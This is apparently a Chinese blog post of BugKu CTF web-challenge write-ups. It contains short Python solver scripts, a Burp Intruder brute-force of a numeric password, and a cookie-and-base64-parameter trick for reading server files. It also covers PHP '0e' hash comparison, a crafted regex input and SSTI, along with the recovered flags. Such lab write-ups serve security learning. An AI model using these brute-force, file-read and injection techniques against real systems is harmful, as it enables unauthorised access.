BugKuWeb

最新推荐文章于 2024-05-06 20:15:00 发布
最新推荐文章于 2024-05-06 20:15:00 发布
阅读量376 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44236278/article/details/99870230
版权

一、秋名山老司机

打开链接要求两秒之内计算出结果
在这里插入图片描述
明显跑脚本,代码如下:

import requests
import re
url='http://123.206.87.240:8002/qiumingshan/'
r = requests.session()
requestpage = r.get(url)
ans = re.findall('<div>(.*?)=?;</div>', requestpage.text)
ans="".join(ans)
ans=ans[:-2]
post=eval(ans)
data={'value':post}
flag=r.post(url, data=data)
print(flag.text)

==========================================================

二、输入密码查看flag

打开链接要求输入5位数字密码
在这里插入图片描述
burp抓包,发送到intruder,payload设置为numbers,From10000to99999,step为1,爆破,获得密码为13579

在这里插入图片描述
拿到flag:flag{bugku-baopo-hah}

===========================================================

三、速度要快

打开链接,只有一句话“我觉得你得快点!”,F12打开控制台
在这里插入图片描述

要求Post找到的margin,然后在网络中发现flag的base64编码,解码出现flag
在这里插入图片描述
然后提交发现不正确,然后打开链接又重新尝试了一下,发现flag变了,下面需要跑脚本

import requests
import base64
import sys    

url = 'http://123.206.87.240:8002/web6/'
req = requests.session()
res = req.get(url)

flag = res.headers['flag']
flag = base64.b64decode(flag)

key = flag[flag.find(':')+2:]
key = base64.b64decode(key)
key = {'margin': key}

ans = req.post(url,key)
print ans.content

然后就会出现flag
在这里插入图片描述
拿到flag:KEY{111dd62fcd377076be18a}

===========================================================

四、cookies欺骗

打开链接一串字符串,尝试base64解码,失败,然后观察URL
在这里插入图片描述
比较特殊的点就是index.php,line和filename。
首先将filename后的字符串a2V5cy50eHQ=解密得到keys.txt,尝试访问keys.txt回显出同样的字符串,说明URL是用base64加密方式构造的,所以首先将index.php进行base64编码得到aW5kZXgucGhw,filename修改成index.php的base64编码访问没有出现结果。这是由于line的限制,调整line,可以看到代码
在这里插入图片描述
一共有18行,完整代码如下:

<?php

error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}

if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}

?>

也可以使用脚本直接爆破整个代码

import requests
a=30
for i in range(a):
    url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw" 
    s=requests.get(url)
    print s.text

然后代码审计发现有一个keys.php文件,只要cookie传参margin=margin就能访问keys.php,值得注意的一点是,URL使用base64编码,所以我们访问的是keys.php的base64编码,即构造URL:http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy5waHA=,然后编辑和重发消息头修改cookie为margin=margin就可以在响应里看到key
在这里插入图片描述

拿到flag:KEY{key_keys}

============================================================

五、never give up

打开链接只有一句“never never give up”,然后F12查看到有一个1p.html的提示,访问http://123.206.87.240:8006/test/1p.html就会跳转到一个CTF论坛界面
在这里插入图片描述
很多选项,直接用view-source来查看源码
在这里插入图片描述
观察Words的特点,发现是url编码,解码会得到含有base64编码的代码

<script>window.location.href='http://www.bugku.com';</script> 
<!--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ==-->

然后对这一部分进行base64解码,然后发现还有一层URL编码,但是发现了关键字f4l2a3g.txt
在这里插入图片描述
然后直接访问f4l2a3g.txt,就可以出现flag

在这里插入图片描述
拿到flag:flag{tHis_iS_THe_fLaG}

===========================================================

六、md5 collision(NUPT_CTF)

打开链接只有一句Please input a,题目是md5 collision,md5碰撞,访问的地址是md5.php。这里考察的一个小技巧就是==的用法,0==以0e开头的哈希值成立。
PHP在处理哈希字符串时,会利用!===来对哈希值进行比较,它把每一个以”0e”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0e”开头的,那么PHP将会认为他们相同,都是0。所以传入一个0e开头的哈希值所对应的字符串,构造?a=s878926199a
在这里插入图片描述
拿到flag:flag{md5_collision_is_easy}

=========================================================

七、PHP_encrypt_1(ISCCCTF)

题目描述是一串base64编码:fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=,解码后的字符串是}l.&W'EG*B(W[(+G'U-0,然后下载一个名为PHP_encrypt_1的压缩包,解压后是index.php文件

<?php
function encrypt($data,$key)
{
    $key = md5('ISCC');
    $x = 0;
    $len = strlen($data);
    $klen = strlen($key);
    for ($i=0; $i < $len; $i++) { 
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];
        $x+=1;
    }
    for ($i=0; $i < $len; $i++) {
        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
    }
    return base64_encode($str);
}
?>

执行附件中的代码就会出出现题目描述中的base64字符串,接下来就是md5解密
参考大佬的wp写出php代码:

<?php
function decrypt($str) {
    $mkey = "729623334f0aa2784a1599fd374c120d";
    $klen = strlen($mkey);
    $tmp = $str;
    $tmp = base64_decode($tmp);  // 对 base64 后的字符串 decode
    $md_len = strlen($tmp); //获取字符串长度
    $x = 0;
    $char = "";
    for($i=0;$i < $md_len;$i++) {  //  取二次加密用 key;
        if ($x == $klen)  // 数据长度是否超过 key 长度检测
            $x = 0;
        $char .= $mkey[$x];  // 从 key 中取二次加密用 key
        $x+=1;
    }
    $md_data = array();
    for($i=0;$i<$md_len;$i++) { // 取偏移后密文数据
        array_push($md_data, ord($tmp[$i]));
    }
    $md_data_source = array();
    $data1 = "";
    $data2 = "";
    foreach ($md_data as $key => $value) { // 对偏移后的密文数据进行还原
        $i = $key;
        if($i >= strlen($mkey)) {$i = $i - strlen($mkey);}
        $dd = $value;
        $od = ord($mkey[$i]);
        array_push($md_data_source,$dd);
        $data1 .= chr(($dd+128)-$od);  // 第一种可能, 余数+128-key 为回归数
        $data2 .= chr($dd-$od);  // 第二种可能, 余数直接-key 为回归数
    }
    print "data1 => ".$data1."<br>\n";
    print "data2 => ".$data2."<br>\n";
}
$str = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=";
decrypt($str);
?>

在这里插入图片描述
data1和data2拼接起来拿到flag:Flag:{asdqwdfasfdawfefqwdqwdadwqadawd}

============================================================

八、字符?正则?

在这里插入图片描述
首先点开链接进行代码审计,发现考察点是正则表达式。需要我们传入一个id,id的值需要与/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i匹配起来。
具体解析:

  1. /两头的斜杠内容代表要匹配的内容/
  2. .代表匹配任意数字
  3. *代表匹配任意数字任意次
  4. {4,7}代表匹配前一个字符4~7次
  5. \表示要找后面的内容\,\/.\/就是找/数字/
  6. [a-z]代表a-z之间的任意字符
  7. [[:punct:]]代表匹配任意标点符号
  8. i代表字体的大小

根据上述规则可构造:?id=key1key1111key:/2/22keya.

在这里插入图片描述
拿到flag:KEY{0x0SIOPh550afc}

参考文章

============================================================

Simple_SSTI_1

题目点击进去发现两个提示,一个是需要一个名为flag的参数,另一个提示flag在secret_key下。
在这里插入图片描述在这里插入图片描述是一个注入题,直接在URL构造返回即可。
在这里插入图片描述知识点:SSTI:服务器模板注入
语法

====================================================

Simple_SSTI_2

点击进去只有一句关于flag是参数的提示
在这里插入图片描述

paintShadow
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
南京邮电大学网络攻防训练平台writeup
weixin_34406086的博客
01-06 3679
本文带目录版本:https://findneo.github.io/170924NuptCTFWP/ 南邮CTF平台网址: http://ctf.nuptsast.com/challenges http://ctf.nuptzj.cn/challenges WEB 签到题 nctf{flag_admiaanaaaaaaaaaaa} ctrl+u或右键查看源代码即可。在CTF比赛中,代码...
【逆向学习笔记1】攻防世界新手逆向题
weixin_45927195的博客
03-03 1517
1.Hello,CTF 拿到文件先运行一下。发现不管输入什么都是wrong,同时程序循环输出“please input your serial:”。需要找到一个正确答案。 用ida(32位)打开文件进行分析,大概流程是输入的字符串转换后若与v13相同,则success。其中关键的转换函数sprintf,指的是字符串格式化命令,主要功能是把格式化的v4写入v8中。 点开其参数asc_408044...
2024年网络安全最全CTF BugKu平台———(Web篇②)_buktu攻防平台(1),互联网寒冬公司倒闭后
最新发布
2401_84267585的博客
05-06 737
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。大概的意思就是v1不等于v2,v1和v2的md5相等,strcmp是比较字符串(区分大小写),v3不等于flag。方法2 :根据if($ac === $f),构造?fn=flag.txt,&ac=bugku,最后得到flag。大概就是使uname的sha1和值与passwd的sha1的值相等即可,但是同时他们两个的值又不能相等。(考的MD5碰撞,网上有很多随便找一个即可。
南邮CTF——WEB Write Up
m0_37784781的博客
11-21 787
南邮CTF——WEB Write Up md5 collision——md5弱类型 题目:md5 collision <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { ...
web-ctf随机数安全
weixin_30776273的博客
04-05 894
rand()函数在产生随机数的时候没有调用srand(),则产生的随机数是有规律可询的. 产生的随机数可以用下面这个公式预测 :state[i]=state[i-3]+state[i-31](一般预测值可能比实际值要差1) $randstr = array(); for ($i = 0; $i <= 50; $i++) { $randst...
CTFshow-web入门-爆破
qq_63575829的博客
04-18 375
CTFshow-web入门-爆破
ctf random 2017-赛客夏令营-Web-random
m0_60955130的博客
12-16 129
试题是这样的,这个网页会产生一个随机数,然后让你预测下一个随机数,很显然如果预测正确就会获得flag,那么我们如何预测一个随机数,我的想法就是猜测,当然如果靠人一次次猜测显然很难猜中,那么我就通过一个循环不停的产生随机数直到某一次他与页面所产生的随机数相同我们便可以获得falg,那么下面我们就通过python去的random库和requests库来实现这一功能。可以看到请求的方式是get那么我们有了这些信息就可以去编写代码了。首先我们先简单的写一个发送请求并打印返回信息的脚本。首先我们线观察一下网页。
信息安全web入门——南邮ctf解题
sevenlob的博客
01-15 1617
南京邮电大学ctf——web 签到题 查看源码 鼠标右键查看源码或ctrl+u md5 collision 题目给出源码 <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { ec...
网络安全萌新杯
分不清东西南北的Laffey
10-15 326
PWN 1.Sig 给你点信心 (nc 120.79.51.146 10000)(flag格式flag{}) https://pan.baidu.com/s/1nbsCdWJ893P6RR5wGN2AIw 密码jzpx nc 120.79.51.146 10000 64位 查找字符串 发现system函数 简单溢出覆盖返回地址 from pwn import * call_addr =...
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中...
bugku题的web类解析
01-29
这个是我自习写的bugku的web的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
湖湘杯 2017 复赛Web部分题解
Assassin
11-25 3316
WebWeb200文件上传一开始真的以为是文件上传,后面发现是骗人的,简单的文件包含,扫描发现存在flag.php payloadhttp://118.190.87.135:10080/?op=php://filter/convert.base64-encode/resource=flag 解密得到flag<?php $flag="flag{c420fb4054e91944a71ff68f70
Bugku——web
chongya927的博客
03-05 1256
菜鸟学习CTF之路
BUGKU--web详解
qq_49422880的博客
05-28 1929
web5-web?前言Web4Web5Web6Web7Web8game1Web11社工-伪造一级目录一级目录 前言   听说bugku的题很适合新手我就来了,感觉前几题都比较简单也没什么好总结的,就从第四题开始吧,后面要是碰到简单的估计只会略微提起几句,大家要是有不理解的知识点,可以私信我。 Web4   就是考察简单的代码审计,只需要传递的what的变量等于flag即可,于是我们可以构造一个payload,用win10的cmd发送,用Burpsuite抓包返包或则firefox的harbar也可以完成这个
【BugKu-web】inspect-me
weixin_73625393的博客
10-23 132
1.启动场景2.按F12查看源代码,找flag值3.flag为:shellmates{CLA$SI1111C_ch4l1enGE}
bugku web题集锦
skysys的研究小屋
06-01 1221
变量1 <?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("args error!"); } eval("var_dump($$args);"); } ?> 正则在线测试:ht
bugku sodirty
09-03
- *1* *3* [Bugku解题 web 【四】](https://blog.csdn.net/weixin_46703850/article/details/115184847)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值